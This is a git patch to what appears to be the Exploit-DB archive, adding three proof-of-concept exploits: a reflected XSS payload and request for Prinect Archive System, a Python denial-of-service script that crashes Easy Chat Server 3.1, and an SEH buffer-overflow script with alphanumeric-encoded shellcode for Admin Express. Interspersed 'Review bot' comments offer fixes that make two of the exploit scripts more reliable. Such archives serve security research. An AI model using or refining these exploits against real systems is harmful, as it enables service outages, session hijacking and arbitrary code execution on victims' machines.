From 6822a23f820782c8e9f1a1fd858fc91db79d2b20 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 8 May 2019 05:02:04 +0000
Subject: [PATCH] DB: 2019-05-08 3 changes to exploits/shellcodes Easy Chat Server 3.1 - 'message' Denial of Service (PoC) Admin Express 1.2.5.485 - 'Folder Path' Local SEH Alphanumeric Encoded Buffer Overflow Prinect Archive System 2015 Release 2.6 - Cross-Site Scripting
---
 exploits/multiple/webapps/46804.txt | 98 +++++++++++++++++++++++
 exploits/windows/dos/46806.py | 65 ++++++++++++++++
 exploits/windows/local/46805.py | 116 ++++++++++++++++++++++++++++
 files_exploits.csv | 3 +
 4 files changed, 282 insertions(+)
 create mode 100644 exploits/multiple/webapps/46804.txt
 create mode 100755 exploits/windows/dos/46806.py
 create mode 100755 exploits/windows/local/46805.py
diff --git a/exploits/multiple/webapps/46804.txt b/exploits/multiple/webapps/46804.txt
new file mode 100644
index 000000000..b6cde369e
--- /dev/null
+++ b/exploits/multiple/webapps/46804.txt
@@ -0,0 +1,98 @@
+Details
+================
+Software: Prinect Archive System
+Version: v2015 Release 2.6
+Homepage: https://www.heidelberg.com
+Advisory report: https://github.com/alt3kx/CVE-2019-10685
+CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10685
+CVSS: 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+CWE-79
+
+Description
+================
+A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Print Archive System v2015 release 2.6
+
+Vulnerability
+================
+The user supplied input containing JavaScript is echoed back in JavaScript code in an HTML response via the "TextField" parameter.
+
+Proof of concept
+================
+
+Reflected XSS
+Payload: %3cscript%3ealert(1)%3c%2fscript%3e
+
+The offending GET request is:
+
+GET /am/Login,loginForm.sdirect?formids=TextField%2cTextField_0%2clink&submitmode=&submitname=&TextField=%3cscript%3ealert(1)%3c%2fscript%3e&TextField_0=l0V%21i1s%21C2 HTTP/1.1
+Host: victim_IP:8090
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
+Connection: close
+Cookie: JSESSIONID=C665EA9A7594E736D39C93EA8763A01F
+
+Reflected XSS Reponse:
+
+HTTP/1.1 200 OK
+Server: Apache-Coyote/1.1
+Content-Type: text/html;charset=UTF-8
+Date: Mon, 04 Feb 2019 13:15:12 GMT
+Connection: close
+
+[../snip]
+
+id="msgContainer">Authentication failed for:
Click Help button for more information about login permissions.
+
+# curl -i -s -k -X GET
+
+-H "Host: victim:8090"
+-H "Accept-Encoding: gzip, deflate"
+-H "Accept: */*"
+-H "Accept-Language: en-US,en-GB;q=0.9,en;q=0.8"
+-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"
+-H "Connection: close"
+-H "Cookie: JSESSIONID=C665EA9A7594E736D39C93EA8763A01F"
+-b "JSESSIONID=C665EA9A7594E736D39C93EA8763A01F"
+"http://victim:8090/am/Login,loginForm.sdirect?formids=TextField%2cTextField_0%2clink&submitmode=&submitname=&TextField=%3cscript%3ealert(1)%3c%2fscript%3e&TextField_0=l0V%21i1s%21C2"
+--proxy http://127.0.0.1:8080
+
+Final payload into URL:
+
+http://victim_IP:8090/am/Login,loginForm.sdirect?formids=TextField%2cTextField_0%2clink&submitmode=&submitname=&TextField=%3cscript%3ealert(1)%3c%2fscript%3e&TextField_0=l0V%21i1s%21C2
+
+Mitigations
+================
+No more feedback from the vendor:
+https://www.heidelberg.com
+
+Disclosure policy
+================
+We believes in responsible disclosure.
+Please contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report.
+
+This vulnerability will be published if we do not receive a response to this report with 10 days.
+
+Timeline
+================
+
+2019-02-04: Discovered
+2019-02-25: Retest PRO environment
+2019-03-25: Retest on researcher's ecosystem
+2019-04-02: Vendor notification
+2019-04-03: Vendor feedback received
+2019-04-08: Reminder sent
+2019-04-08: 2nd reminder sent
+2019-04-11: Internal communication
+2019-04-26: No more feedback received from the vendor
+2019-05-30: New issues found
+2019-06-30: Public Disclosure
+
+Discovered by:
+Alex Hernandez aka alt3kx:
+================
+Please visit https://github.com/alt3kx for more information.
+
+My current exploit list @exploit-db:
+https://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576
\ No newline at end of file
diff --git a/exploits/windows/dos/46806.py b/exploits/windows/dos/46806.py
new file mode 100755
index 000000000..bdc9d9d7f
--- /dev/null
+++ b/exploits/windows/dos/46806.py
@@ -0,0 +1,65 @@
+#!/usr/bin/python
+#---------------------------------------------------------
+# Title: Easy Chat Server Version 3.1 - (DOS)
+# Date: 2019-05-07
+# Author: Miguel Mendez Z
+# Team: www.exploiting.cl
+# Vendor: http://www.echatserver.com
+# Software Link: http://www.echatserver.com/ecssetup.exe
+# Platforms: Windows
+# Version: 3.1
+# Tested on: Windows Windows 7_x86/7_x64 [eng]
+#---------------------------------------------------------
+#
+# 1- Primer socket con (GET) generamos una sesion valida para luego hacer el paso 2.
+# 2- Segundo enviamos (POST) la data en la variable message para crashear la aplicacion.
+
+import os, sys, socket
+from time import sleep
+
+ip = '127.0.0.1'
+padding = 'A' * 8000
+
+GET = (
+"GET /chat.ghp?username=1&password=&room=1&sex=1 HTTP/1.1\r\n"
+"User-Agent: Mozilla/4.0\r\n"
+"Host: "+str(ip)+":80\r\n"
+"Accept-Language: en-us\r\n"
+"Accept-Encoding: gzip, deflate\r\n"
+"Referer: http://"+str(ip)+"\r\n"
+"Connection: Keep-Alive\r\n\r\n"
+)
+
+try:
+    print "\n [*] Ejecutando payload GET (Creando Sesion) - length " + str(len(GET))
+    s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s1.connect((ip, 80))
+    s1.send(GET)
+    s1.recv(1024)
+    s1.close()
+except:
+    print "Sin conexion GET"
+
+sleep(3)
+
+POST = (
+"POST /body2.ghp?username=1&password=&room=1 HTTP/1.1\r\n"
+"Host: "+str(ip)+"\r\n"
+"User-Agent: Mozilla/4.0\r\n"
+"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+"Accept-Language: es-CL,en-US;q=0.5\r\n"
+"Accept-Encoding: gzip, deflate\r\n"
+"Referer: http://"+str(ip)+"/chatsubmit.ghp?username=1&password=&room=1\r\n"
+"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
+"staticname=%3A000539&tnewname=&msayinfo=1&mnewname=&mtowho=All&mfilters=0&mfont=0&mfcolor=1&elist=&seltype=Theme&msg=&Submit=Send&sc=on¬ifysound=on&message="+str(padding)+"&chat_flag="
+)
+
+try:
+    print " [*] Ejecutando payload POST (Crashing) - length " + str(len(POST))
+    s2 = 
socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s2.connect((ip, 80))
+    s2.send(POST)
+    s2.recv(1024)
+    s2.close()
+except:
+    print "Sin conexion POST"
\ No newline at end of file
diff --git a/exploits/windows/local/46805.py b/exploits/windows/local/46805.py
new file mode 100755
index 000000000..d5823d20d
--- /dev/null
+++ b/exploits/windows/local/46805.py
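Review bot: Both `try` blocks end in a bare `except:`, so a refused connection, a blocking `recv` interrupted with Ctrl-C and a typo in the request string all collapse into the same `Sin conexion` message and the script carries on to `sleep(3)` regardless; narrowing to `except socket.error as e:` / `print "Sin conexion GET: " + str(e)` (and the same for the POST block) keeps the best-effort behaviour while showing why it failed. `send` is also not guaranteed to write the whole 8 KB body in one call, so `s2.sendall(POST)` is the call that actually sends the full request. The POST body reads `sc=on¬ifysound=on` in this rendering, which looks like `&notifysound=on` mangled by HTML-entity decoding of `&not`; worth confirming the committed file contains the literal `&`. `os` and `sys` are imported but never used.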
@@ -0,0 +1,116 @@
+# Title: Admin Express v1.2.5.485 Folder Path Local SEH Alphanumeric Encoded Buffer Overflow
+# Date: May 6th, 2019
+# Author: Connor McGarr (https://connormcgarr.github.io)
+# Vendor Homepage: https://admin-express.en.softonic.com/
+# Software Link: https://admin-express.en.softonic.com/download
+# Version v1.2.5.485
+# Tested on: Windows XP SP3 EN
+
+# TO RUN:
+# 1. Run python script
+# 2. Copy contents of pwn.txt
+# 3. Open AdminExpress
+# 4. Select System Compare
+# 5. Paste contents into Folder Path on the left hand side
+# 6. Press the scale icon in the middle of the screen, under the Services and Running Processes tabs
+
+
+# This got a bit hairy. We manually encoded our shellcode, and we had to use the sub method for each encode.
+# 05 was a bad char for us, which was an add eax opcode. We could use (in hex) 1-4,6,10-7E and this was an odd character set.
+
+# calc.exe shellcode:
+# "\x31\xc9\x51\x68"
+# "\x63\x61\x6c\x63"
+# "\x54\xB8\xc7\x93"
+# "\xc2\x77\xff\xd0"
+# Can replace with a shell, if you are willing to do the encoding and decoding math :-) Too preoccupied for now, so here is a calc.exe
+
+# For zeroing out registers before manual shellcode
+zero = "\x25\x01\x01\x01\x01" # and eax, 0x01010101
+zero += "\x25\x10\x10\x10\x10" # and eax, 0x10101010
+
+# For restoring stack pointer before execution of shellcode, due to
+# old stack pointer value needed. This puts 0x0012DC98 into ECX, to be used later
+restore = "\x54" # push esp; (pushing the current value of ESP, which needs to be restored later, onto the stack)
+restore += "\x59" # pop ecx; (holding the value of old ESP in ECX, to be called later.)
+restore += "\x51" # push ecx; (to get the value on the stack for the mov esp command later)
+
+# Stack alignment
+# Need to make ESP 0x012F3F4. Using sub method to write that value onto the stack.
+# AFter making ESP 0x012F3F4, it should be the same value as EAX- so we can write up the stack. 
+alignment = "\x54" # push esp
+alignment += "\x58" # pop eax; (puts the value of ESP into EAX)
+
+# Write these 3 sub values in normal format, since memory address, not instruction to be executed.
+# 364D5555 364D5555 364E5555
+alignment += "\x2d\x38\x4d\x55\x55" # sub eax, 0x384D5555
+alignment += "\x2d\x36\x4d\x55\x55" # sub eax, 0x364D5555
+alignment += "\x2d\x36\x4e\x55\x55" # sub eax, 0x364E5555
+alignment += "\x50" # push eax
+alignment += "\x5c" # pop esp; (puts the value of eax back into esp)
+
+# calc.exe shellcode, via the sub method. Values needed are as followed. Reference the calc.exe shellcode line for line numbers.
+# 1st line = 2C552D14 01562D14 01562E16
+shellcode = zero
+shellcode += "\x2d\x14\x2d\x55\x2c" # sub eax, 0x2C552D14
+shellcode += "\x2d\x14\x2d\x55\x01" # sub eax, 0x01562D14
+shellcode += "\x2d\x16\x2e\x56\x01" # sub eax, 0x01562E16
+shellcode += "\x50" # push eax; (get the value on the stack). We will do this for all remaining steps like this one.
+
+# 2nd line = 24121729 24121739 2414194A
+shellcode += zero
+shellcode += "\x2d\x29\x17\x12\x24" # sub eax, 0x24121729
+shellcode += "\x2d\x39\x17\x12\x24" # sub eax, 0x24121739
+shellcode += "\x2d\x4a\x19\x14\x24" # sub eax, 0x2414194A (was 40 at the end, but a miscalc happened. Changed to 4A)
+shellcode += "\x50" # push eax
+
+# 3rd line = 34313635 34313434 34313434
+shellcode += zero
+shellcode += "\x2d\x35\x36\x31\x34" # sub eax, 0x34313635
+shellcode += "\x2d\x34\x34\x31\x34" # sub eax, 0x34313434
+shellcode += "\x2d\x34\x34\x31\x34" # sub eax, 0x34313434
+shellcode += "\x50" # push eax
+
+# 4th line = 323A1245 323A1245 333A1245
+shellcode += zero
+shellcode += "\x2d\x45\x12\x3a\x32" # sub eax, 0x323A1245
+shellcode += "\x2d\x45\x12\x3a\x32" # sub eax, 0x323A1245
+shellcode += "\x2d\x45\x12\x3a\x33" # sub eax, 0x333A1245
+shellcode += "\x50" # push eax
+
+# We need to restore the old ESP value of 0x0012DC98 to spawn calc.exe. 
Since it is a syscall,
+# We need the ESP value before execution. We will do this by performing MOV ECX, ESP (remember ECX contains old ESP!)
+# Here are the 3 values: 3F3F2711 3F3F2711 3F3F2811
+# For some reason the application changed some of my math. 3F3F2811 was supposed to be
+# 403F3F2811 and so I changed it by 1 hex byte to get the CC (was getting CD)
+move = zero
+move += "\x2d\x40\x3f\x27\x11" # sub eax, 0x3F3F2711
+move += "\x2d\x3f\x3f\x27\x11" # sub eax, 0x3F3F2711
+move += "\x2d\x3f\x3f\x28\x11" # sub eax, 0x3F3F2811
+move += "\x50" # push eax
+
+# All together now.
+payload = "\x41" * 4260
+payload += "\x70\x7e\x71\x7e" # JO 126 hex bytes. If jump fails, default to JNO 126 hex bytes
+payload += "\x42\x4c\x01\x10" # 0x10014c42 pop pop ret wmiwrap.DLL
+
+# There are 2 NULL (\x00) terminators in our buffer of A's, near our nSEH jump. We are going to jump far away from them
+# so we have enough room for our shellcode and to decode.
+payload += "\x41" * 122 # add padding since we jumped 7e (126 bytes) above
+payload += "\x70\x7e\x71\x7e" # JO or JNO another 126 bytes, so shellcode can decode
+payload += "\x41" * 124
+payload += "\x70\x7e\x71\x7e" # JO or JNO another 126 bytes, so shellcode can decode
+payload += "\x41" * 124
+payload += "\x70\x79\x71\x79" # JO or JNO only 121 bytes
+payload += "\x41" * 121 # NOP is in the restricted chars. Using \x41 as a slide into alignment
+payload += restore
+payload += alignment
+payload += shellcode
+payload += move
+payload += "\x43" * (5000-len(payload))
+
+print payload
+
+f = open('pwn.txt', 'w')
+f.write(payload)
+f.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 886dff79b..11fba4ea6 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
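Review bot: The output file at the end of the hunk is opened in text mode and closed by hand, so an exception in `write` leaves the handle open and, on Windows, any 0x0a in the buffer would be rewritten as 0x0d 0x0a; none of the bytes assembled above is 0x0a today, so this is latent rather than live, but `with open('pwn.txt', 'wb') as f:` / `    f.write(payload)` removes both problems. The comment `# 364D5555 364D5555 364E5555` above the first alignment block disagrees with the instruction it annotates, `sub eax, 0x384D5555`; one of the two should be corrected so the arithmetic can be re-checked from the comments alone. `print payload` also writes raw bytes such as 0x01 and 0x10 straight to the terminal, where `print repr(payload)` or `print len(payload)` would be readable. The module docstring-style header explains the encoding choice but never states which Python version the `print` statements require, which is worth a one-line `# Python 2` note.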
@@ -6409,6 +6409,7 @@ id,file,description,date,author,type,platform,port
 46781,exploits/linux/dos/46781.txt,"Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification",2019-04-30,"Google Security Research",dos,linux,
 46793,exploits/windows/dos/46793.txt,"SolarWinds DameWare Mini Remote Control 10.0 - Denial of Service",2019-05-03,"Dino Barlattani",dos,windows,
 46803,exploits/ios/dos/46803.c,"iOS 12.1.3 - 'cfprefsd' Memory Corruption",2019-05-06,ZecOps,dos,ios,
+46806,exploits/windows/dos/46806.py,"Easy Chat Server 3.1 - 'message' Denial of Service (PoC)",2019-05-07,"Miguel Mendez Z",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10453,6 +10454,7 @@ id,file,description,date,author,type,platform,port
 46756,exploits/windows/local/46756.rb,"RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)",2019-04-25,Metasploit,local,windows,
 46779,exploits/windows/local/46779.py,"DeviceViewer 3.12.0.1 - 'user' SEH Overflow",2019-04-30,"Hayden Wright",local,windows,
 46802,exploits/windows/local/46802.txt,"NSClient++ 0.5.2.35 - Privilege Escalation",2019-05-06,bzyo,local,windows,
+46805,exploits/windows/local/46805.py,"Admin Express 1.2.5.485 - 'Folder Path' Local SEH Alphanumeric Encoded Buffer Overflow",2019-05-07,"Connor McGarr",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -41231,3 +41233,4 @@ id,file,description,date,author,type,platform,port
 46796,exploits/multiple/webapps/46796.txt,"ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution",2019-05-06,"Gilson Camelo",webapps,multiple,
 46798,exploits/php/webapps/46798.txt,"PHPads 2.0 - 'click.php3?bannerID' SQL Injection",2019-05-06,"felipe andrian",webapps,php,80
 46799,exploits/asp/webapps/46799.txt,"microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection",2019-05-06,"felipe andrian",webapps,asp,80
+46804,exploits/multiple/webapps/46804.txt,"Prinect Archive System 2015 Release 2.6 - Cross-Site Scripting",2019-05-07,alt3kx,webapps,multiple,80